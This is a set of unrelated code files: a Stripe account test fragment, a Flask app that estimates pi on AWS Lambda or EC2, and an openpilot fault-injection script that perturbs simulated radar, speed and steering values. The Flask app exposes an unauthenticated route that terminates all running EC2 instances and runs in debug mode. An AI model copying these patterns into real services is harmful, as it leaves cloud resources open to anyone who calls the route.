{'reason': 'fraud'},
None
)
def test_reject_account_without_reason(self):
self.mock_response({
'id': 'acct_reject',
'verification': {
'disabled_reason': 'rejected.fraud'
},
})
obj = stripe.Account.construct_from({
'id': 'acct_reject'
}, 'mykey')
self.assertTrue(obj is obj.reject())
self.assertEqual('rejected.fraud', obj.verification['disabled_reason'])
self.assertEqual('acct_reject', obj.id)
self.requestor_mock.request.assert_called_with(
'post',
'/v1/accounts/acct_reject/reject',
{},
None
)
def test_verify_additional_owner(self):
acct = stripe.Account.construct_from({
'id': 'acct_update',
'additional_owners': [{
'first_name': 'Alice',
'verification': {},
}]
}, 'api_key')
owner = acct.additional_owners[0]
owner.verification.document = 'file_foo'
acct.save()
self.requestor_mock.request.assert_called_with(
'post',
'/v1/accounts/acct_update',
{
'additional_owners': {
'0': {
'verification': {
'document': 'file_foo',
},
},
},
},
None,
)
|
<filename>Application/index.py
import os
import logging
from flask import Flask, request, render_template
app = Flask(__name__)
def doRender(tname, values={}):
if not os.path.isfile( os.path.join(os.getcwd(), 'templates/'+tname) ):
return render_template('index.htm')
return render_template(tname, **values)
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def mainPage(path):
return doRender(path)
@app.route('/terminate')
def terminate():
os.environ['AWS_SHARED_CREDENTIALS_FILE']='./cred'
import sys
import boto3
ids = []
ec2 = boto3.resource('ec2', region_name='us-east-1')
instances = ec2.instances.filter(Filters=[{'Name': 'instance-state-name', 'Values': ['running']}])
for instance in instances:
ids.append(instance.id)
if (ids != []):
ec2.instances.filter(InstanceIds=ids).stop()
ec2.instances.filter(InstanceIds=ids).terminate()
return doRender( 'index.htm', {})
@app.route('/calculate', methods=['POST'])
def calculate():
#!/usr/bin/env python3
import queue
import threading
import math
import json
import http.client
# Modified from: http://www.ibm.com/developerworks/aix/library/au-threadingpython/
# and fixed with try-except around urllib call
service = request.form.get('service')
shots = int(request.form.get('shots'))
rate = request.form.get('rate')
digits = int(request.form.get('digits'))-1
runs = int(request.form.get('resources'))
eachInstanceShots = shots/runs
count = 0
queue = queue.Queue()
if (service == 'lambda'):
class ThreadUrl(threading.Thread):
def __init__(self, queue, task_id):
threading.Thread.__init__(self)
self.queue = queue
self.task_id = task_id
self.incircles = []
self.results = []
self.resourceId = []
self.runningTime = []
def run(self):
count = self.queue.get()
host = "jy6u38g96k.execute-api.us-east-1.amazonaws.com"
try:
c = http.client.HTTPSConnection(host)
jsons= '{ "key1": "'+str(int(eachInstanceShots))+'", "key2": "'+rate+'", "key3": "'+str(digits)+'"}'
c.request("POST", "/default/test", jsons)
response = c.getresponse()
data = response.read().decode('utf-8')
data = json.loads(data)
self.incircles.extend(data[0])
self.results.extend(data[1])
self.runningTime.append(data[2])
self.resourceId.append(self.task_id)
except IOError:
print( 'Failed to open ' , host )
self.queue.task_done()
def parallel_run():
threads=[]
for i in range(0, runs):
t = ThreadUrl(queue, i)
threads.append(t)
t.setDaemon(True)
t.start()
for x in range(0, runs):
queue.put(count)
queue.join()
incircles = [t.incircles for t in threads]
results = [t.results for t in threads]
resourceId = [t.resourceId for t in threads]
runningTime = [t.runningTime for t in threads]
return incircles, results, resourceId, runningTime
mergedIncircles = []
mergedResults = []
stringedResults = ''
mergedResourceId = []
pi = int(math.pi*(10**digits))/10**digits
piValues = ''
matched = 0
roundNum = 9
sumTime = 0
for a in range(0,9):
incircles, results, resourceId, runningTime = parallel_run()
sumResults = 0
# merging results arrays
for i in range(0, len(results)):
for j in range(0,len(results[i])):
mergedResults.append(results[i][j])
# merging incircles arrays
for i in range(0, len(incircles)):
mergedIncircles.append(incircles[i])
for i in range(0, len(resourceId)):
mergedResourceId.append(resourceId[i])
# Adding up results
for i in range(0, len(mergedResults)):
sumResults = sumResults + mergedResults[i]
# Adding up runningTime
for i in range(0, len(runningTime)):
for j in range(0,len(runningTime[i])):
sumTime = sumTime + runningTime[i][j]
# Final estimation
finalResult = int(sumResults/len(mergedResults)*(10**digits))/10**digits
if( pi == finalResult):
matched = 1
roundNum = a+1
break
# transform results to string
for i in range(0,len(mergedResults)):
stringedResults = stringedResults + str(mergedResults[i]) + ','
stringedResults = stringedResults[:-1]
for i in range(0,len(mergedResults)):
piValues = piValues + str(pi) + ','
comCost = sumTime*512/1024*0.0000000083
reqCost = roundNum*runs*0.2/10**6
finalCost = comCost + reqCost
finalCost = f'{finalCost:.12f}'
comCost = f'{comCost:.12f}'
reqCost = f'{reqCost:.12f}'
return doRender( 'result.htm', {'stringedResults': piValues + '|' + stringedResults, 'incircles': mergedIncircles, 'resourceId': mergedResourceId, 'rate': int(rate), 'roundNum': roundNum, 'matched': matched, 'finalResult': finalResult, 'pi': pi, 'finalCost': finalCost, 'shots': shots, 'rate': rate, 'resources': runs, 'digits': digits+1, 'reqCost': reqCost,'comCost': comCost})
else:
#running ec2 instances
os.environ['AWS_SHARED_CREDENTIALS_FILE']='./cred'
import sys
import boto3
ec2 = boto3.resource('ec2', region_name='us-east-1')
dnss = []
instances = ec2.instances.filter(Filters=[{'Name': 'instance-state-name', 'Values': ['running']}])
for instance in instances:
dnss.append(instance.public_dns_name)
if (dnss == []):
instances = ec2.create_instances(
ImageId='ami-0147982d8de757491',
MinCount=1,
MaxCount=runs,
InstanceType='t2.micro',)
return doRender( 'result.htm', {})
@app.errorhandler(500)
def server_error(e):
logging.exception('ERROR!')
return """
An error occurred: <pre>{}</pre>
""".format(e), 500
if __name__ == '__main__':
app.run(host='127.0.0.1', port=8080, debug=True)
|
<reponame>gitguige/openpilot0.8.9
import os
import numpy as np
import random
def gen_add_code(trigger_code, trigger, t1, t2, variable, stuck_value, additional_code):
assert(len(variable) == len(stuck_value))
if trigger_code:
code = trigger_code
else:
if len(trigger)>1:
code = 'if %s>=%s and %s<=%s:' % \
(trigger[0], t1, trigger[1], t2)
else:
code = 'if %s>=%s and %s<=%s:' % \
(trigger[0], t1, trigger[0], t2)
for v, s in zip(variable, stuck_value):
l = '//%s+=%s' % (v,s)
code = code + l
code = code + additional_code
return code
def gen_sub_code(trigger_code, trigger, t1, t2, variable, stuck_value, additional_code):
assert(len(variable) == len(stuck_value))
if trigger_code:
code = trigger_code
else:
code = 'if %s>=%s and %s<=%s:' % \
(trigger[0], t1, trigger[0], t2)
for v, s in zip(variable, stuck_value):
l = '//%s-=%s' % (v,s)
code = code + l
code = code + additional_code
return code
def gen_none_code(trigger_code, trigger, t1, t2, additional_code):
if trigger_code:
code = trigger_code
else:
code = 'if %s>=%s and %s<=%s:' % \
(trigger[0], t1, trigger[0], t2)
l = '//none'
code = code + l
code = code + additional_code
return code
def gen_uniform_rand_code(trigger_code, trigger, t1, t2, variable, d1, d2, additional_code):
if trigger_code:
code = trigger_code
else:
code = 'if %s>=%s and %s<=%s:' % \
(trigger[0], t1, trigger[0], t2)
for i in range(len(variable)):
delta = random.uniform(d1,d2) + (i*3.7)
l = '//%s+=(%s)' % (variable[i],str(delta))
code = code + l
code = code + additional_code
return code
def gen_stuck_code(trigger_code, trigger, t1, t2, variable, stuck_value, additional_code):
assert(len(variable) == len(stuck_value))
if trigger_code:
code = trigger_code
else:
code = 'if %s>=%s and %s<=%s:' % \
(trigger[0], t1, trigger[0], t2)
for v, s in zip(variable, stuck_value):
l = '//%s=%s' % (v,s)
code = code + l
code = code + additional_code
return code
### Write codes to fault library file
def write_to_file(fileName, code, param, exp_name, target_file, faultLoc):
if os.path.isdir('fault_library') != True:
os.makedirs('fault_library')
fileName = 'fault_library/scenario_'+str(sceneNum)
out_file = fileName+'.txt'
param_file = fileName+'_params.csv'
with open(out_file, 'w') as outfile:
print out_file
outfile.write('title:' + exp_name + '\n')
outfile.write('location//' + target_file+ '//'+faultLoc + '\n')
for i, line in enumerate(code):
outfile.write('fault ' + str(i+1) + '//' + line + '\n')
outfile.write('Total number of fault cases: '+str(i+1))
with open(param_file, 'w') as outfile:
for i, line in enumerate(param):
outfile.write(str(i) + ',' + line + '\n')
with open('run_fault_inject_campaign.sh', 'a+') as runFile:
runFile.write('python run.py '+fileName+'\n')
### Write codes to fault library file -- for vision effects
def write_to_vision_file(fileName, code, param, exp_name, target_file, faultLoc):
if os.path.isdir('fault_library') != True:
os.makedirs('fault_library')
effect = fileName
fileName = 'fault_library/scenario_'+str(sceneNum)
out_file = fileName+'.txt'
param_file = fileName+'_params.csv'
with open(out_file, 'w') as outfile:
print out_file
outfile.write('title:' + exp_name + '\n')
outfile.write('location//' + target_file+ '//'+faultLoc + '\n')
for i, line in enumerate(code):
outfile.write('fault ' + str(i+1) + '//' + line + '\n')
outfile.write('Total number of fault cases: '+str(i+1))
with open(param_file, 'w') as outfile:
for i, line in enumerate(param):
outfile.write(str(i) + ',' + line + '\n')
with open('run_fault_inject_campaign.sh', 'a+') as runFile:
for thickness in range(1,11):
if os.path.isdir('../output_files/'+str(sceneNum)+'_vision_'+effect+'/'+str(thickness)) != True:
os.makedirs('../output_files/'+str(sceneNum)+'_vision_'+effect+'/'+str(thickness))
runFile.write('./run_matlab_openpilot.sh '+effect+' '+str(thickness)+'\n')
runFile.write('python run.py '+fileName+'\n')
runFile.write('cp -R '+'../output_files/'+exp_name+' '+'../output_files/'+str(sceneNum)+'_vision_'+effect+'/'+str(thickness)+'/\n')
###########################################################
### d_rel-add-incRADAR-H1
def gen_rel_dist_add_fault_plant(sceneNum):
title = str(sceneNum)+'_d_rel-add-incRADAR-H1'
faultLibFile = 'fault_library/dRelPlantRad'
fileLoc = 'selfdrive/test/plant/plant.py'
faultLoc = '#radar_dRel:HOOK#'
trigger = ['frameIdx']
trigger_code = ['if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed>0:','if headway_time>2.0 and RSpeed<=0:']
code = []
param = []
variable = ['radar_dRel']
deltaRange = np.arange(15,190,10)
invRange = np.arange(201,256,10)
for trig in np.arange(0,len(trigger_code)):
for dt in [30.0]:
t2 = dt
for d in deltaRange:
delta = random.randint(d,d+9)
t1 = random.randint(2,29)
#code.append(gen_add_code(trigger_code, trigger, t1, t2, variable, [delta], '//if '+variable[0]+'>=255:'+'// '+variable[0]+'= 254'))
code.append(gen_add_code('', trigger, t1*100., t2*100., variable, [delta], ''))
param.append(','.join(['relative distance',str(t1),str(dt),str(delta)]))
for dt in [30.0]:
t2 = dt
for d in invRange:
delta = random.randint(d,d+9)
t1 = random.randint(2,29)
#code.append(gen_add_code(trigger_code, trigger, t1, t2, variable, [delta], '//if '+variable[0]+'>=255:'+'// '+variable[0]+'= 254'))
code.append(gen_add_code('', trigger, t1*100., t2*100., variable, [delta], ''))
param.append(','.join(['relative distance',str(t1),str(dt),str(delta)]))
write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### v_rel-add-incRADAR-H1
def gen_rel_vel_add_fault_plant(sceneNum):
title = str(sceneNum)+'_v_rel-add-incRADAR-H1'
faultLibFile = 'fault_library/vRelPlant'
fileLoc = 'selfdrive/test/plant/plant.py'
faultLoc = '#radar_dRel:HOOK#'
trigger = ['frameIdx']
trigger_code = ['if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed>0:','if headway_time>2.0 and RSpeed<=0:']
code = []
param = []
variable = ['v_rel']
deltaRange = np.arange(10,61,10)
for trig in np.arange(0,len(trigger_code)):
for dt in [30.0]:
t2 = dt
for d in deltaRange:
t1 = random.randint(2,29)
delta = random.randint(d,d+9)
if delta > 60:
delta = 60
delta = delta*0.44704 # 1MPH = 0.44704 m/s
code.append(gen_add_code('', trigger, t1*100., t2*100., variable, [delta], ''))
param.append(','.join(['relative speed',str(t1),str(dt),str(delta)]))
write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### d_rel-sub-incRADAR-H2
def gen_rel_dist_sub_fault_plant(sceneNum):
title = str(sceneNum)+'_d_rel-sub-incRADAR-H2'
faultLibFile = 'fault_library/dRelPlantRad'
fileLoc = 'selfdrive/test/plant/plant.py'
faultLoc = '#radar_dRel:HOOK#'
trigger = ['frameIdx']
trigger_code = ['if headway_time>2.0 and RSpeed<=0:','if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed>0:']
code = []
param = []
variable = ['radar_dRel']
deltaRange = np.arange(10,255,10)
for trig in np.arange(0,len(trigger_code)):
for d in deltaRange:
for dt in [30.]:
t2 = dt
t1 = random.randint(2,29)
delta = random.randint(d,d+9)
code.append(gen_sub_code('',trigger, t1*100., t2*100., variable, [delta], '//if '+variable[0]+'<0:'+'// '+variable[0]+'= 0'))
param.append(','.join(['relative distance',str(t1),str(dt),str(delta)]))
write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### v_rel-sub-incRADAR-H2
def gen_rel_vel_sub_fault_plant(sceneNum):
title = str(sceneNum)+'_v_rel-sub-incRADAR-H2'
faultLibFile = 'fault_library/vRelPlant'
fileLoc = 'selfdrive/test/plant/plant.py'
faultLoc = '#radar_dRel:HOOK#'
trigger = ['frameIdx']
trigger_code = ['if headway_time>2.0 and RSpeed<=0:','if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed>0:']
code = []
param = []
variable = ['v_rel']
deltaRange = np.arange(10,61,10)
for trig in np.arange(0,len(trigger_code)):
for d in deltaRange:
for dt in [30.]:
t2 = dt
delta = random.randint(d,d+9)
t1 = random.randint(2,29)
if delta > 60:
delta = 60
delta = delta*0.44704 # 1MPH = 0.44704 m/s
code.append(gen_sub_code('', trigger, t1*100., t2*100., variable, [delta], ''))
param.append(','.join(['relative speed',str(t1),str(dt),str(delta)]))
write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### radar-none-incRADAR-H1
def gen_radar_jamming_fault_plant_H1(sceneNum):
title = str(sceneNum)+'_radar-none-incRADAR-H1'
faultLibFile = 'fault_library/radJamPlant'
fileLoc = 'selfdrive/test/plant/plant.py'
faultLoc = '#radar_none:HOOK#'
trigger = ['frameIdx']
trigger_code = ['if headway_time>2.0 or RSpeed>0:', 'if headway_time>2.0 or RSpeed<=0:', 'if headway_time<=2.0 or RSpeed<=0:'] # reverse of actual trigger
code = []
param = []
variable = []
for trig in np.arange(0,len(trigger_code)):
for dt in [0.0]:
t1 = random.randint(2,29)
t2 = dt
code.append(gen_none_code('', trigger, t2*100., t1*100., ''))
param.append(','.join(['radar jamming',str(t1),str(dt),'none']))
write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### radar-none-incRADAR-H2
def gen_radar_jamming_fault_plant_H2(sceneNum):
title = str(sceneNum)+'_radar-none-incRADAR-H2'
faultLibFile = 'fault_library/radJamPlant'
fileLoc = 'selfdrive/test/plant/plant.py'
faultLoc = '#radar_none:HOOK#'
trigger = ['frameIdx']
trigger_code = ['if headway_time<=2.0 or RSpeed>0:']
code = []
param = []
variable = []
for trig in np.arange(0,len(trigger_code)):
for dt in [0.0]:
t1 = random.randint(2,29)
t2 = dt
code.append(gen_none_code('', trigger, t2*100., t1*100., ''))
param.append(','.join(['radar jamming',str(t1),str(dt),'none']))
write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### curr_sp-sub-incProcPlant-H1
def gen_curr_sp_sub_fault_plant(sceneNum):
title = str(sceneNum)+'_curr_sp-sub-incProcPlant-H1'
faultLibFile = 'fault_library/vCurrSpPlant'
fileLoc = 'selfdrive/test/plant/plant.py'
faultLoc = '#speed:HOOK#'
trigger = ['frameIdx']
trigger_code = ['if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed<=0:']
code = []
param = []
variable = ['speed2send']
deltaRange = np.arange(10,61,10)
for trig in np.arange(0,len(trigger_code)):
for dt in [30.0]:
t2 = dt
for d in deltaRange:
delta = random.randint(d,d+9)
if delta > 60:
delta = 60
delta = delta*0.44704 # 1MPH = 0.44704 m/s
t1 = random.randint(2,29)
code.append(gen_sub_code('', trigger, t1*100., t2*100., variable, [delta], '//if '+variable[0]+'<0:'+'// '+variable[0]+'= 0'))
param.append(','.join(['current speed',str(t1),str(dt),str(delta)]))
write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### curr_sp-add-incProcPlant-H2
def gen_curr_sp_add_fault_plant(sceneNum):
title = str(sceneNum)+'_curr_sp-add-incProcPlant-H2'
faultLibFile = 'fault_library/vCurrSpPlant'
fileLoc = 'selfdrive/test/plant/plant.py'
faultLoc = '#speed:HOOK#'
trigger = ['frameIdx']
trigger_code = ['if headway_time>2.0 and RSpeed<=0:','if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed>0:']
code = []
param = []
variable = ['speed2send']
deltaRange = np.arange(10,61,10)
for trig in np.arange(0,len(trigger_code)):
for d in deltaRange:
for dt in [30.]:
t2 = dt
delta = random.randint(d,d+9)
if delta > 60:
delta = 60
delta = delta*0.44704 # 1MPH = 0.44704 m/s
t1 = random.randint(2,29)
code.append(gen_add_code('', trigger, t1*100., t2*100., variable, [delta], '//if '+variable[0]+'>=85.0:'+'// '+variable[0]+'= 85.0'))
param.append(','.join(['current speed',str(t1),str(dt),str(delta)]))
write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### md-rand-incProcPlant-H3
def gen_md_rand_val_plant(lane,sceneNum):
title = str(sceneNum)+'_'+lane+'Lane-rand-incProcPlant-H3'
faultLibFile = 'fault_library/mdPlant_'+lane
fileLoc = 'selfdrive/test/plant/maneuver.py'
faultLoc = '#md:HOOK#'
trigger = ['self.frameIdx']
trigger_code = ['if headway_time<=2.0 and RSpeed>=0:', 'if headway_time>2.0 and RSpeed<=0:','if headway_time<=2.0 and RSpeed<=0:','if headway_time>2.0 and RSpeed>0:']
code = []
param = []
if lane.lower()=='left':
variable = ['self.lLane']
elif lane.lower()=='right':
variable = ['self.rLane']
else:
variable = ['self.lLane','self.rLane']
deltaRange = np.arange(-2.5,2.5,0.5)
for trig in np.arange(0,len(trigger_code)):
for dt in [30.0]:
t2 = dt
for d1 in deltaRange:
d2 = d1+1
t1 = random.randint(2,29)
code.append(gen_uniform_rand_code('', trigger, t1*100., t2*100., variable, d1, d2, ''))
param.append(','.join(['path model',str(t1),str(dt),str(d1),str(d2)]))
write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### angSteer-add-incProcPlant-H3
def gen_angle_steer_add_plant(sceneNum):
title = str(sceneNum)+'_angSteer-add-incProcPlant-H3'
faultLibFile = 'fault_library/angSteerPlant'
fileLoc = 'selfdrive/test/plant/plant.py'
faultLoc = '#angle_steer:HOOK#'
trigger = ['frameIdx']
trigger_code = ['if headway_time>2.0 and RSpeed>=0:','if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:','if headway_time>2.0 and RSpeed>0:']
code = []
param = []
variable = ['angle_steer2send']
deltaRange = np.arange(-45,46,10)
for trig in np.arange(0,len(trigger_code)):
for dt in [30.0]:
t2 = dt
for d in deltaRange:
delta = random.randint(d,d+9)
if d > 45:
alpha = 45*3.1416/180.0
else:
alpha = delta*3.1416/180.0
t1 = random.randint(2,29)
code.append(gen_add_code('', trigger, t1*100., t2*100., variable, ['('+str(alpha)+')'], ''))
param.append(','.join(['steer angle',str(t1),str(dt),str(alpha)]))
write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### vision-none-miscommVisPlant-H3
def gen_vision_miscomm_fault_plant(sceneNum):
title = str(sceneNum)+'_vision-none-miscommVisPlant-H3'
faultLibFile = 'fault_library/visMiscommPlant'
fileLoc = 'selfdrive/test/plant/plant.py'
faultLoc = '#md_none:HOOK#'
trigger = ['frameIdx']
trigger_code = ['if headway_time>2.0 or RSpeed<0:','if headway_time>2.0 or RSpeed>0', 'if headway_time<=2.0 or RSpeed<=0', 'if headway_time<=2.0 or RSpeed>0']
code = []
param = []
variable = []
for trig in np.arange(0,len(trigger_code)):
for dt in [0.0]:
t2 = dt
t1 = random.randint(2,29)
code.append(gen_none_code('', trigger, t2*100., t1*100., ''))
param.append(','.join(['vision miscomm',str(t1),str(dt),'none']))
write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### vision-effect-noisyInputManeuver-H3
def gen_vision_noisyInput_fault_Maneuver(effect, sceneNum):
title = str(sceneNum)+'_vision-effect-noisyInputManeuver-H3'
faultLibFile = ''
fileLoc = 'selfdrive/test/plant/maneuver.py'
faultLoc = '#visionFault:HOOK#'
trigger = ['self.frameIdx']
trigger_code = ['if headway_time<=2.5 and RSpeed>=0:', 'if headway_time>2.5 and RSpeed>0:','if headway_time>2.5 and RSpeed<=0:','if headway_time<=2.5 and RSpeed<0:']
code = []
param = []
#variable = ['left_line','right_line']
#deltaRange = ['lanes[0]','lanes[1]']
variable = ['self.effect', 'self.thickness']
if effect <7:
range_th = range(1,11)
elif effect == 7:
range_th = range(3,7)
elif effect == 8:
range_th = [3,5,7]
elif effect == 9:
range_th = [3,5]
for trig in np.arange(0,len(trigger_code)):
for dt in [30.0]:
for th in range_th:
t2 = dt
t1 = random.randint(2,29)
code.append(gen_stuck_code('', trigger, t1*100., t2*100., variable, [str(effect), str(th)], ''))
param.append(','.join(['vision noisyInput',str(t1),str(dt),'none']))
write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### d_rel-add-incVision-H1
def gen_vision_dRel_add_fault_plant(sceneNum):
title = str(sceneNum)+'_d_rel-add-incVision-H1'
faultLibFile = 'fault_library/dRelPlantVis'
fileLoc = 'selfdrive/test/plant/plant.py'
faultLoc = '#vision_dRel:HOOK#'
trigger = ['frameIdx']
trigger_code = ['if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed>0:','if headway_time>2.0 and RSpeed<=0:']
code = []
param = []
variable = ['vision_dRel']
deltaRange = np.arange(15,255,10)
for trig in np.arange(0,len(trigger_code)):
for dt in [30.0]:
t2 = dt
for d in deltaRange:
delta = random.randint(d,d+9)
t1 = random.randint(2,29)
#code.append(gen_add_code(trigger_code, trigger, t1, t2, variable, [delta], '//if '+variable[0]+'>=255:'+'// '+variable[0]+'= 254'))
code.append(gen_add_code('', trigger, t1*100., t2*100., variable, [delta], ''))
param.append(','.join(['relative distance',str(t1),str(dt),str(delta)]))
write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### d_rel-sub-incVision-H2
def gen_vision_dRel_sub_fault_plant(sceneNum):
title = str(sceneNum)+'_d_rel-sub-incVision-H2'
faultLibFile = 'fault_library/dRelPlantVis'
fileLoc = 'selfdrive/test/plant/plant.py'
faultLoc = '#vision_dRel:HOOK#'
trigger = ['frameIdx']
trigger_code = ['if headway_time>2.0 and RSpeed<=0:','if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed>0:']
code = []
param = []
variable = ['vision_dRel']
deltaRange = np.arange(10,255,10)
for trig in np.arange(0,len(trigger_code)):
for d in deltaRange:
for dt in [30.0]:
t2 = dt
delta = random.randint(d,d+9)
t1 = random.randint(2,29)
code.append(gen_sub_code('',trigger, t1*100., t2*100., variable, [delta], '//if '+variable[0]+'<0:'+'// '+variable[0]+'= 0'))
param.append(','.join(['relative distance',str(t1),str(dt),str(delta)]))
write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### d_rel-add-incRadVis-H1
def gen_RadVis_dRel_add_fault_plant(sceneNum):
title = str(sceneNum)+'_d_rel-add-incRadVis-H1'
faultLibFile = 'fault_library/dRelPlantRadVis'
fileLoc = 'selfdrive/test/plant/plant.py'
faultLoc = '#RadVis_dRel:HOOK#'
trigger = ['frameIdx']
trigger_code = ['if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed<=0:']
code = []
param = []
variable = ['d_rel']
deltaRange = np.arange(15,255,10)
for trig in np.arange(0,len(trigger_code)):
for dt in [30.0]:
t2 = dt
for d in deltaRange:
delta = random.randint(d,d+9)
t1 = random.randint(2,29)
#code.append(gen_add_code(trigger_code, trigger, t1, t2, variable, [delta], '//if '+variable[0]+'>=255:'+'// '+variable[0]+'= 254'))
code.append(gen_add_code('', trigger, t1*100., t2*100., variable, [delta], ''))
param.append(','.join(['relative distance',str(t1),str(dt),str(delta)]))
write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### d_rel-sub-incRadVis-H2
def gen_RadVis_dRel_sub_fault_plant(sceneNum):
title = str(sceneNum)+'_d_rel-sub-incRadVis-H2'
faultLibFile = 'fault_library/dRelPlantRadVis'
fileLoc = 'selfdrive/test/plant/plant.py'
faultLoc = '#RadVis_dRel:HOOK#'
trigger = ['frameIdx']
trigger_code = ['if headway_time>2.0 and RSpeed<=0:','if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed>0:']
code = []
param = []
variable = ['d_rel']
deltaRange = np.arange(10,255,10)
for trig in np.arange(0,len(trigger_code)):
for d in deltaRange:
for dt in [30.0]:
t2 = dt
delta = random.randint(d,d+9)
t1 = random.randint(2,29)
code.append(gen_sub_code('',trigger, t1*100., t2*100., variable, [delta], '//if '+variable[0]+'<0:'+'// '+variable[0]+'= 0'))
param.append(','.join(['relative distance',str(t1),str(dt),str(delta)]))
write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
##########################################
###_main_###
with open('run_fault_inject_campaign.sh', 'w') as runFile:
runFile.write('#Usage: python run.py target_fault_library\n')
scenarios = {
1 : gen_rel_dist_add_fault_plant,
2 : gen_rel_vel_add_fault_plant,
3 : gen_rel_dist_sub_fault_plant,
4 : gen_rel_vel_sub_fault_plant,
5 : gen_radar_jamming_fault_plant_H1,
6 : gen_radar_jamming_fault_plant_H2,
9 : gen_curr_sp_sub_fault_plant,
12 : gen_curr_sp_add_fault_plant,
13 : gen_md_rand_val_plant,
14 : gen_md_rand_val_plant,
15 : gen_md_rand_val_plant,
16 : gen_angle_steer_add_plant,
34 : gen_vision_miscomm_fault_plant,
35 : gen_vision_noisyInput_fault_Maneuver,
36 : gen_vision_noisyInput_fault_Maneuver,
37 : gen_vision_noisyInput_fault_Maneuver,
38 : gen_vision_noisyInput_fault_Maneuver,
39 : gen_vision_dRel_add_fault_plant,
40 : gen_vision_dRel_sub_fault_plant,
41 : gen_RadVis_dRel_add_fault_plant,
42 : gen_RadVis_dRel_sub_fault_plant,
43 : gen_vision_noisyInput_fault_Maneuver,
44 : gen_vision_noisyInput_fault_Maneuver,
45 : gen_vision_noisyInput_fault_Maneuver,
46 : gen_vision_noisyInput_fault_Maneuver,
47 : gen_vision_noisyInput_fault_Maneuver
}
lanes = ['left','right','both'] # 'left','right','both'
poly = ['p_path','left','right','d_path'] # 'p_path','left','right','d_path'
#effects = ['rain', 'fog', 'snow', 'occlusion']
effects = [1,2,3,4,5,6,7,8,9]
for sceneNum in [1,2,3,4,5,6,9,12,13,14,15,16,34,39,40,41,42]: # experiments without the vision
#for sceneNum in [35,36,37,38,43,44,45,46,47]: # for testing the faults in input images
#for sceneNum in [1,2,3,4,5,6,9,12,13,14,15,16,34,35,36,37,38,39,40,41,42,43,44,45,46,47]: # for testing the faults in inputs
# for sceneNum in [44,45,46,47]:
print sceneNum
cmd = 'cp '+ 'fault_library/scenario_'+str(sceneNum)+'.txt '+'fault_library/scenario_'+str(sceneNum)+'_prev.txt'
os.system(cmd)
if sceneNum >= 13 and sceneNum <=15:
scenarios[sceneNum](lanes[sceneNum-13],sceneNum)
elif sceneNum >= 28 and sceneNum <=31:
scenarios[sceneNum](poly[sceneNum-28],sceneNum)
elif sceneNum >= 35 and sceneNum <=38:
scenarios[sceneNum](effects[sceneNum-35],sceneNum)
elif sceneNum >= 43 and sceneNum <=47:
scenarios[sceneNum](effects[sceneNum+4-43],sceneNum)
else:
scenarios[sceneNum](sceneNum)
|
<reponame>sophiayue1116/sagemaker-debugger
# Standard Library
import calendar
import json
import multiprocessing as mp
import os
import time
from datetime import datetime
from pathlib import Path
# Third Party
import pytest
# First Party
from smdebug.core.tfevent.timeline_file_writer import TimelineFileWriter
from smdebug.profiler.profiler_config_parser import ProfilerConfigParser
from smdebug.profiler.profiler_constants import (
CONVERT_TO_MICROSECS,
DEFAULT_PREFIX,
TRACE_DIRECTORY_FORMAT,
)
@pytest.fixture()
def complete_profiler_config_parser(config_folder, monkeypatch):
config_path = os.path.join(config_folder, "complete_profiler_config_parser.json")
monkeypatch.setenv("SMPROFILER_CONFIG_PATH", config_path)
return ProfilerConfigParser()
@pytest.fixture()
def file_open_fail_profiler_config_parser(config_folder, monkeypatch):
config_path = os.path.join(config_folder, "file_open_fail_profiler_config_parser.json")
monkeypatch.setenv("SMPROFILER_CONFIG_PATH", config_path)
return ProfilerConfigParser()
@pytest.fixture()
def rotation_profiler_config_parser(config_folder, monkeypatch):
def _choose_config(rotation_policy=None):
nonlocal config_folder
nonlocal monkeypatch
config_path = os.path.join(
config_folder, rotation_policy + "_rotation_profiler_config_parser.json"
)
monkeypatch.setenv("SMPROFILER_CONFIG_PATH", config_path)
return ProfilerConfigParser()
return _choose_config
def test_create_timeline_file(simple_profiler_config_parser, out_dir):
"""
This test is meant to test successful creation of the timeline file according to file path specification.
$ENV_BASE_FOLDER/framework/pevents/$START_TIME_YYMMDDHR/$FILEEVENTSTARTTIMEUTCINEPOCH_
{$ENV_NODE_ID_4digits0padded}_pythontimeline.json
It reads backs the file contents to make sure it is in valid JSON format.
"""
assert simple_profiler_config_parser.profiling_enabled
